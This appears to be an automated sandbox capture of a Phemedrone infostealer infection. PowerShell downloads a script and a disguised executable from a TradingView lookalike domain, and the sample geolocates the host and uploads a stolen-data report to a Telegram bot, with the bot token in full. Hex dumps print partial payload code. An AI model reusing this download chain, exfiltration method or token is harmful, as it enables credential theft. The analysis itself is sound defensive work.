                                                          Nov 4, 2024 09:39:05.266911983 CET1.1.1.1192.168.2.110x3c72No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                          Nov 4, 2024 09:39:17.775837898 CET1.1.1.1192.168.2.110x650cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • apitradingview.com
                                                          • get.geojs.io
                                                          • api.telegram.org

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.114971786.104.15.604438016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-11-04 08:38:53 UTC105OUTGET /ermando1.txt HTTP/1.1
                                                          User-Agent: TradingView
                                                          Host: apitradingview.com
                                                          Connection: Keep-Alive
                                                          2024-11-04 08:38:53 UTC435INHTTP/1.1 200 OK
                                                          Connection: close
                                                          content-type: application/octet-stream
                                                          last-modified: Sat, 26 Oct 2024 21:19:04 GMT
                                                          accept-ranges: bytes
                                                          content-length: 1933
                                                          date: Mon, 04 Nov 2024 08:38:53 GMT
                                                          server: LiteSpeed
                                                          content-disposition: attachment
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-11-04 08:38:53 UTC933INData Raw: 24 69 73 41 64 6d 69 6e 20 3d 20 5b 62 6f 6f 6c 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 50 72 69 6e 63 69 70 61 6c 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 29 29 2e 49 73 49 6e 52 6f 6c 65 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e 52 6f 6c 65 5d 3a 3a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 29 0d 0a 0d 0a 69 66 20 28 2d 6e 6f 74 20 24 69 73 41 64 6d 69 6e 29 20 7b 0d 0a 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 45 72 72 6f 72 3a 20 43 6d 64 20 6d 75 73 74 20 62 65 20 72 75 6e 20 61 73 20 61 64 6d 69 6e
                                                          Data Ascii: $isAdmin = [bool](New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)if (-not $isAdmin) { Write-Host "Error: Cmd must be run as admin
                                                          2024-11-04 08:38:53 UTC1000INData Raw: 69 73 74 20 27 2d 70 6b 65 6b 27 2c 20 27 2d 61 6f 61 27 2c 20 27 2d 79 27 20 2d 50 61 73 73 54 68 72 75 0d 0a 24 70 72 6f 63 65 73 73 2e 57 61 69 74 46 6f 72 45 78 69 74 28 29 0d 0a 0d 0a 24 64 65 6c 65 74 65 64 20 3d 20 24 66 61 6c 73 65 0d 0a 77 68 69 6c 65 20 28 2d 6e 6f 74 20 24 64 65 6c 65 74 65 64 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 54 65 73 74 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 78 65 50 61 74 68 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 23 20 d0 9f d1 80 d0 be d0 b2 d0 b5 d1 80 d0 ba d0 b0 2c 20 d1 87 d1 82 d0 be 20 d0 bf d1 80 d0 be d1 86 d0 b5 d1 81 d1 81 20 d0 b7 d0 b0 d0 b2 d0 b5 d1 80 d1 88 d1 91 d0 bd 0d 0a 20 20 20 20 20 20 20 20 24 72 75 6e 6e 69 6e 67 50 72 6f 63 65 73 73 65 73 20 3d 20 47 65 74 2d 50 72 6f 63 65 73 73 20 7c 20 57
                                                          Data Ascii: ist '-pkek', '-aoa', '-y' -PassThru$process.WaitForExit()$deleted = $falsewhile (-not $deleted) { if (Test-Path -Path $exePath) { # , $runningProcesses = Get-Process | W


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.114973386.104.15.604438016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-11-04 08:38:55 UTC160OUTGET /WDSecureUtilities.exe HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: apitradingview.com
                                                          2024-11-04 08:38:56 UTC404INHTTP/1.1 200 OK
                                                          Connection: close
                                                          content-type: application/x-msdownload
                                                          last-modified: Sat, 26 Oct 2024 18:55:44 GMT
                                                          accept-ranges: bytes
                                                          content-length: 252416
                                                          date: Mon, 04 Nov 2024 08:38:55 GMT
                                                          server: LiteSpeed
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-11-04 08:38:56 UTC964INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 45 28 1d 67 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 2e 02 00 00 aa 01 00 00 00 00 00 2e 4d 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 04 00 00 02 00 00 4a 7e 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELE(g"0..M `@ @J~`
                                                          2024-11-04 08:38:56 UTC14994INData Raw: 04 7d 2d 00 00 0a 2a d2 20 1a 50 6c ea 20 29 55 55 a5 5a 28 20 00 00 0a 02 7b 2c 00 00 0a 6f 24 00 00 0a 58 20 29 55 55 a5 5a 28 22 00 00 0a 02 7b 2d 00 00 0a 6f 25 00 00 0a 58 2a 1e 02 7b 2e 00 00 0a 2a 1e 02 7b 2f 00 00 0a 2a 56 02 28 1f 00 00 0a 02 03 7d 2e 00 00 0a 02 04 7d 2f 00 00 0a 2a d2 20 4a 61 bb 65 20 29 55 55 a5 5a 28 20 00 00 0a 02 7b 2e 00 00 0a 6f 24 00 00 0a 58 20 29 55 55 a5 5a 28 22 00 00 0a 02 7b 2f 00 00 0a 6f 25 00 00 0a 58 2a 1e 02 7b 30 00 00 0a 2a 1e 02 7b 31 00 00 0a 2a 56 02 28 1f 00 00 0a 02 03 7d 30 00 00 0a 02 04 7d 31 00 00 0a 2a d2 20 3a 8c b6 6e 20 29 55 55 a5 5a 28 20 00 00 0a 02 7b 30 00 00 0a 6f 24 00 00 0a 58 20 29 55 55 a5 5a 28 22 00 00 0a 02 7b 31 00 00 0a 6f 25 00 00 0a 58 2a 1e 02 7b 32 00 00 0a 2a 1e 02 7b 33 00
                                                          Data Ascii: }-* Pl )UUZ( {,o$X )UUZ("{-o%X*{.*{/*V(}.}/* Jae )UUZ( {.o$X )UUZ("{/o%X*{0*{1*V(}0}1* :n )UUZ( {0o$X )UUZ("{1o%X*{2*{3
                                                          2024-11-04 08:38:56 UTC16384INData Raw: 00 0a 74 27 00 00 1b 02 7b 56 00 00 04 7b 51 00 00 04 28 b7 01 00 06 0d 09 6f 59 00 00 0a 17 2f 02 14 2a 09 06 07 08 02 7b 56 00 00 04 7b 52 00 00 04 02 7b 56 00 00 04 7b 53 00 00 04 02 7b 55 00 00 04 28 37 01 00 06 2a 00 1b 30 06 00 18 03 00 00 24 00 00 11 73 3b 00 00 0a 0a 73 69 00 00 0a 25 1f 1a 28 3c 00 00 0a 6f 6a 00 00 0a 6f 93 00 00 0a 0b 38 d2 02 00 00 12 01 28 94 00 00 0a 7e 59 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a1 00 00 06 73 95 00 00 0a 25 80 59 00 00 04 28 3d 01 00 06 6f 93 00 00 0a 0c 38 80 02 00 00 12 02 28 94 00 00 0a 0d 02 14 09 28 9c 00 00 06 13 04 09 72 a6 4b 00 70 28 43 02 00 06 28 48 00 00 0a 13 05 02 11 05 28 9d 00 00 06 6f 93 00 00 0a 13 06 38 2c 02 00 00 12 06 28 94 00 00 0a 13 07 11 07 17 8d 5b 00 00 01 25 16 1f 5c 9d 6f 9c
                                                          Data Ascii: t'{V{Q(oY/*{V{R{V{S{U(7*0$s;si%(<ojo8(~Y%-&~Xs%Y(=o8((rKp(C(H(o8,([%\o
                                                          2024-11-04 08:38:56 UTC16384INData Raw: 07 2a 11 09 2a 00 01 1c 00 00 00 00 a4 00 20 c4 00 03 99 00 00 01 02 00 2f 00 bf ee 00 08 00 00 00 00 1b 30 02 00 77 00 00 00 5b 00 00 11 14 0a 72 a0 7c 00 70 28 43 02 00 06 02 8c 60 00 00 01 28 da 00 00 0a 0b 72 2b 7d 00 70 28 43 02 00 06 07 73 e7 00 00 0a 6f e8 00 00 0a 6f e9 00 00 0a 0c 2b 2c 08 6f ea 00 00 0a 74 9a 00 00 01 72 4d 7d 00 70 28 43 02 00 06 6f eb 00 00 0a a5 9b 00 00 01 0d 09 28 6b 01 00 0a 0a de 03 26 de 00 08 6f ec 00 00 0a 2d cc de 0a 08 2c 06 08 6f 01 00 00 0a dc 06 2a 00 01 1c 00 00 00 00 55 00 09 5e 00 03 01 00 00 01 02 00 33 00 38 6b 00 0a 00 00 00 00 13 30 05 00 88 00 00 00 5c 00 00 11 28 6d 01 00 0a 25 8e 69 73 6e 01 00 0a 0a 20 04 01 00 00 73 6f 01 00 0a 0b 0c 16 0d 2b 31 08 09 9a 16 18 6f b9 00 00 0a 13 04 11 04 07 20 04 01 00
                                                          Data Ascii: ** /0w[r|p(C`(r+}p(Csoo+,otrM}p(Co(k&o-,o*U^38k0\(m%isn so+1o
                                                          2024-11-04 08:38:56 UTC16384INData Raw: 00 00 28 6c 00 00 0a fe 0e 00 00 73 f4 00 00 0a fe 0e 01 00 20 00 00 00 00 fe 0e 02 00 2b 4c fe 0c 00 00 fe 0c 02 00 91 7e 78 01 00 04 fe 0c 02 00 7e 78 01 00 04 6f 59 00 00 0a 5d 6f 61 01 00 0a fe 0e 03 00 fe 0c 03 00 61 d1 fe 0e 04 00 fe 0c 01 00 fe 0c 04 00 6f 24 02 00 0a 26 fe 0c 02 00 20 01 00 00 00 58 fe 0e 02 00 fe 0c 02 00 fe 0c 00 00 8e 69 32 a8 fe 0c 01 00 6f 26 00 00 0a 2a 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 48 64 00 00 23 7e 00 00 b4 64 00 00 90 5d 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 44 c2 00 00 a0 88 00 00 23 55 53 00 e4 4a 01 00 10 00 00 00 23 47 55 49 44 00 00 00 f4 4a 01 00 0c 25 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 bf a2 3f 09 1e 00 00 00
                                                          Data Ascii: (ls +L~x~xoY]oaao$& Xi2o&*BSJBv4.0.30319lHd#~d]#StringsD#USJ#GUIDJ%#BlobW?
                                                          2024-11-04 08:38:56 UTC16384INData Raw: 27 2f 00 00 06 00 0a 4d 02 00 01 00 00 33 00 00 02 00 6b 4e 00 00 01 00 0a 4d 00 00 02 00 80 18 00 00 01 00 14 33 00 00 02 00 8f 48 00 00 01 00 14 33 00 00 02 00 8f 48 00 00 03 00 27 2f 00 00 04 00 0a 4d 00 00 01 00 6b 4e 00 00 01 00 0a 4d 00 00 02 00 80 18 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 01 51 00 00 04 00 f8 50 00 00 05 00 54 4e 00 00 06 00 8f 48 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 01 51 00 00 04 00 f8 50 00 00 05 00 54 4e 00 00 06 00 8f 48 00 00 07 00 27 2f 00 00 08 00 0a 4d 00 00 01 00 54 4e 00 00 02 00 6b 4e 00 00 01 00 0a 4d 00 00 02 00 80 18 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 f0 50 00 00 04 00 e8 50 00 00 05 00 87 48 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 f0 50 00 00 04 00 e8 50 00 00 05 00 87 48 00
                                                          Data Ascii: '/M3kNM3H3H'/MkNML [QPTNHL [QPTNH'/MTNkNML [PPHL [PPH
                                                          2024-11-04 08:38:56 UTC16384INData Raw: 6f 70 6f 76 65 6c 6f 6b 61 6c 75 66 65 00 46 72 6f 6d 49 6d 61 67 65 00 53 65 63 74 69 6f 6e 49 6d 61 67 65 00 49 6e 70 75 74 4c 61 6e 67 75 61 67 65 00 6c 61 6e 67 75 61 67 65 00 45 6d 61 67 69 67 65 00 41 64 64 52 61 6e 67 65 00 59 68 6f 68 61 68 75 6e 61 63 69 7a 6f 63 61 68 65 00 53 65 63 74 69 6f 6e 4e 6f 43 61 63 68 65 00 41 73 65 70 61 76 61 6a 75 74 6f 63 6f 74 79 68 65 00 63 6f 6f 6b 69 65 00 54 61 6b 65 00 59 6d 6f 6e 61 66 61 67 79 68 61 78 6f 62 6f 6b 65 00 45 6e 64 49 6e 76 6f 6b 65 00 42 65 67 69 6e 49 6e 76 6f 6b 65 00 59 7a 79 6d 79 6c 65 78 6f 63 75 62 75 6b 65 00 45 67 75 64 61 78 6f 62 75 66 75 6b 65 00 41 6d 79 72 6f 6e 61 6d 75 67 79 6b 65 00 49 73 43 6c 69 70 62 6f 61 72 64 46 6f 72 6d 61 74 41 76 61 69 6c 61 62 6c 65 00 49 45 6e 75
                                                          Data Ascii: opovelokalufeFromImageSectionImageInputLanguagelanguageEmagigeAddRangeYhohahunacizocaheSectionNoCacheAsepavajutocotyhecookieTakeYmonafagyhaxobokeEndInvokeBeginInvokeYzymylexocubukeEgudaxobufukeAmyronamugykeIsClipboardFormatAvailableIEnu
                                                          2024-11-04 08:38:56 UTC16384INData Raw: 6a 61 6b 75 76 65 6b 79 67 65 6c 75 73 75 6d 79 00 41 6e 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 41 68 61 72 61 73 69 70 75 64 61 6e 75 6e 79 00 4f 78 69 72 61 74 69 78 61 76 75 6e 79 00 59 66 6f 76 75 70 69 6a 79 72 79 6e 79 00 4f 7a 69 78 65 72 75 72 65 70 79 00 41 78 65 63 79 6d 69 6e 79 6b 69 70 79 00 50 61 67 65 57 72 69 74 65 43 6f 70 79 00 42 6c 6f 63 6b 43 6f 70 79 00 46 69 6c 65 4d 61 70 43 6f 70 79 00 70 45 6e 74 72 6f 70 79 00 49 66 6f 64 69 6b 61 6b 69 66 79 70 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 44 69 72 65 63 74 6f 72 79 00 64 69 72 65 63 74 6f 72 79 00 5a 69 70 46 69 6c 65 45 6e 74 72 79 00 52 65 67 69 73 74 72 79 00 4f 67 75 6c 61 74 65 66 75 78 75 6d 65 6c 6f 73 79 00 4f 73 79 73 75 67 61 67 79 6d 69 76 79 62 65 74 79 00 6f 70 5f 45
                                                          Data Ascii: jakuvekygelusumyAnySelectManyAharasipudanunyOxiratixavunyYfovupijyrynyOzixerurepyAxecyminykipyPageWriteCopyBlockCopyFileMapCopypEntropyIfodikakifypyLoadLibraryDirectorydirectoryZipFileEntryRegistryOgulatefuxumelosyOsysugagymivybetyop_E
                                                          2024-11-04 08:38:57 UTC16384INData Raw: 00 41 00 6f 00 63 00 41 00 41 00 55 00 3d 00 00 19 4f 00 78 00 38 00 62 00 62 00 67 00 49 00 64 00 41 00 42 00 41 00 64 00 00 59 42 00 77 00 51 00 52 00 56 00 67 00 51 00 58 00 42 00 68 00 41 00 49 00 46 00 42 00 6f 00 41 00 42 00 68 00 38 00 42 00 42 00 51 00 34 00 4e 00 43 00 55 00 6b 00 48 00 48 00 51 00 34 00 59 00 42 00 52 00 6f 00 61 00 46 00 67 00 55 00 58 00 42 00 51 00 41 00 3d 00 00 29 4f 00 41 00 55 00 58 00 54 00 51 00 59 00 63 00 54 00 43 00 49 00 49 00 47 00 78 00 67 00 44 00 48 00 51 00 3d 00 3d 00 00 59 47 00 41 00 49 00 53 00 57 00 77 00 49 00 63 00 43 00 52 00 4d 00 41 00 47 00 52 00 4d 00 42 00 42 00 42 00 45 00 4d 00 43 00 51 00 4d 00 47 00 43 00 56 00 49 00 50 00 47 00 77 00 59 00 59 00 44 00 68 00 34 00 57 00 43 00 51 00 45 00 65 00
                                                          Data Ascii: AocAAU=Ox8bbgIdABAdYBwQRVgQXBhAIFBoABh8BBQ4NCUkHHQ4YBRoaFgUXBQA=)OAUXTQYcTCIIGxgDHQ==YGAISWwIcCRMAGRMBBBEMCQMGCVIPGwYYDh4WCQEe
                                                          2024-11-04 08:38:57 UTC16384INData Raw: 79 00 4a 00 54 00 67 00 2f 00 52 00 51 00 3d 00 3d 00 00 29 4f 00 41 00 73 00 4c 00 58 00 41 00 30 00 46 00 50 00 41 00 63 00 47 00 46 00 42 00 45 00 56 00 47 00 6a 00 6b 00 44 00 00 49 4e 00 43 00 34 00 63 00 54 00 77 00 6f 00 53 00 43 00 53 00 6b 00 6c 00 46 00 68 00 6f 00 4c 00 43 00 42 00 34 00 31 00 43 00 77 00 77 00 44 00 43 00 31 00 77 00 41 00 42 00 51 00 4d 00 48 00 4e 00 51 00 3d 00 3d 00 00 29 4a 00 51 00 55 00 44 00 55 00 41 00 38 00 64 00 44 00 56 00 70 00 63 00 57 00 55 00 52 00 47 00 51 00 51 00 3d 00 3d 00 00 71 51 00 55 00 6f 00 34 00 53 00 52 00 4d 00 64 00 43 00 53 00 49 00 4d 00 46 00 54 00 38 00 50 00 48 00 56 00 39 00 53 00 58 00 56 00 39 00 45 00 53 00 67 00 39 00 44 00 57 00 53 00 63 00 39 00 50 00 54 00 6f 00 34 00 53 00 6b 00 6b
                                                          Data Ascii: yJTg/RQ==)OAsLXA0FPAcGFBEVGjkDINC4cTwoSCSklFhoLCB41CwwDC1wABQMHNQ==)JQUDUA8dDVpcWURGQQ==qQUo4SRMdCSIMFT8PHV9SXV9ESg9DWSc9PTo4Skk


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.1149754172.67.70.2334433432C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-11-04 08:38:59 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                          Host: get.geojs.io
                                                          Connection: Keep-Alive
                                                          2024-11-04 08:38:59 UTC1097INHTTP/1.1 200 OK
                                                          Date: Mon, 04 Nov 2024 08:38:59 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-request-id: b4a5be1bbaa54448f22a783d52d4be24-ASH
                                                          strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                          access-control-allow-origin: *
                                                          access-control-allow-methods: GET
                                                          pragma: no-cache
                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          geojs-backend: ash-01
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3nbXZ3HUmwW4PyZAuv9s6xBmzCiU0Th2Lj9ZLdf9%2BWKs5RYnBzO1MiJCuEhhKHJhEegLcdVzyUfutEO0DmRVHFaQ2XYQ09Ph4HSt%2BtJH3aqFFhZAXHDmQZhXM6Ti%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          X-Content-Type-Options: nosniff
                                                          Server: cloudflare
                                                          CF-RAY: 8dd34a7d1e166996-DFW
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=690&delivery_rate=2250194&cwnd=246&unsent_bytes=0&cid=1f35afd6257d90f5&ts=228&x=0"
                                                          2024-11-04 08:38:59 UTC272INData Raw: 31 35 66 0d 0a 7b 22 6c 61 74 69 74 75 64 65 22 3a 22 33 31 2e 30 30 36 35 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 39 37 2e 38 34 30 36 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 38 31 30 30 20 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 61 73 6e 22 3a 38 31 30 30 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 63 69 74
                                                          Data Ascii: 15f{"latitude":"31.0065","longitude":"-97.8406","accuracy":20,"timezone":"America\/Chicago","ip":"173.254.250.69","organization":"AS8100 ASN-QUADRANET-GLOBAL","country_code":"US","asn":8100,"area_code":"0","organization_name":"ASN-QUADRANET-GLOBAL","cit
                                                          2024-11-04 08:38:59 UTC86INData Raw: 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 7d 0a 0d 0a
                                                          Data Ascii: ntry_code3":"USA","continent_code":"NA","country":"United States","region":"Texas"}
                                                          2024-11-04 08:38:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.1149795149.154.167.2204433432C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-11-04 08:39:06 UTC384OUTPOST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                          Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0
                                                          Host: api.telegram.org
                                                          Content-Length: 723700
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          2024-11-04 08:39:06 UTC25INHTTP/1.1 100 Continue
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 38 32 33 61 65 37 61 37 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 84 22 85 1f 94 34 c9 59 00 0b f7 72 1a 3c 79 5d 95 7c 57 45 d8 b8 0d 80 6e 9f 75 92 3a 65 28 e5 bd 57 08 87 e2 e7 77 b3 e0 6e ac 0c 81 e2 10 e3 19 33 54 fc 04 fe 40 95 18 50 47 07 26 91 4c
                                                          Data Ascii: ------------------------------8dcfc823ae7a7a0Content-Disposition: form-data; name="document"; filename="[US]173.254.250.69-Phemedrone-Report.phem"Content-Type: application/octet-stream"4Yr<y]|WEnu:e(Wwn3T@PG&L
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 6d 8e ba fb 5a ad 22 cf fe 5e c3 84 1a 59 49 c9 0e b2 d9 ec 12 cc 50 20 24 ed ee d9 dc 37 c9 5f d1 dd d3 ee 9b 98 46 86 22 f5 a9 21 41 d8 18 bf 6a fb 64 c6 57 ae bf b6 47 d7 21 9e 70 08 e5 62 62 ac 43 4c 7e 55 3e e4 5d 27 c7 c4 be 80 a5 6a ed 67 89 82 64 af a6 f5 b1 35 f7 5b 3d 87 ad 2c af 68 a0 d2 93 cc 67 65 30 6e 15 6a 92 51 0c 6e 24 30 9b 66 cf 3e 32 fc 72 ed 58 55 c4 20 4b 43 1b df c6 21 f8 00 44 64 05 09 58 e6 99 9d 24 00 f3 33 4c 82 29 04 86 0c 83 70 03 17 c1 47 8d f3 cc 00 49 7e f7 ba a2 95 4e a3 8c 9e ed 10 99 8f 0d 97 5d 7a b7 70 ec d1 36 2d 8b db 19 85 d5 0c f0 6f 64 ba 6b 6d fd a0 2a 5d 00 74 f9 9d 6d 51 f5 db b8 c0 3e 53 23 72 35 54 83 85 92 11 be 88 04 55 2e eb a1 4e 3d 7b f3 91 70 88 61 8d 95 9d 76 f4 7b 3c b0 8e 26 37 f2 75 62 6d d6 96 5a
                                                          Data Ascii: mZ"^YIP $7_F"!AjdWG!pbbCL~U>]'jgd5[=,hge0njQn$0f>2rXU KC!DdX$3L)pGI~N]zp6-odkm*]tmQ>S#r5TU.N={pav{<&7ubmZ
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 4c c8 b1 8b c1 15 39 bc 7b 81 a6 bc 6e f6 ba 66 bb 9b d6 06 eb 63 eb 09 63 a2 e3 b6 4f b1 80 d7 34 11 46 13 d3 a0 72 7f 89 71 88 cd 3a 8e de ca 4c 19 9c 95 3d 6a d0 5c 0d df 97 6d a5 e2 00 f1 e4 ab 5b 6a d8 b1 37 74 d8 33 8f 3c 1a 2c 43 62 38 ba 94 b9 3e 0a 7d 72 b7 30 0d f5 14 25 74 e8 d5 b4 62 26 9b ea 99 ec f8 96 5d 45 88 c3 c5 61 bc d5 7c 64 ab 0d 5b 43 fa a8 16 d8 3a 7c 2b ce e7 e6 2d b0 0a 0e 5a e4 2e b8 5a 91 43 2e 87 5e e5 f1 f1 75 74 1a 64 ae 5c a1 9e 14 1c 39 09 d3 fb e1 a3 65 a4 1a d2 e3 e2 de 88 64 fd 44 b9 c3 5e 11 4d 4c 1e 6b 18 d2 25 53 fb 30 1e ff a4 30 ef 2c f4 fb 66 91 ad bf 06 18 dd 65 99 9c f0 f1 ac 12 2a 2a be 3c 72 26 43 3b e4 18 48 8c a8 2c 7f e8 be fe f1 5c ba ca 3f ce 26 3e 97 e9 6c bd e1 2b 14 e6 a7 06 ab 21 55 11 1f 5b cb 69 87
                                                          Data Ascii: L9{nfccO4Frq:L=j\m[j7t3<,Cb8>}r0%tb&]Ea|d[C:|+-Z.ZC.^utd\9edD^MLk%S00,fe**<r&C;H,\?&>l+!U[i
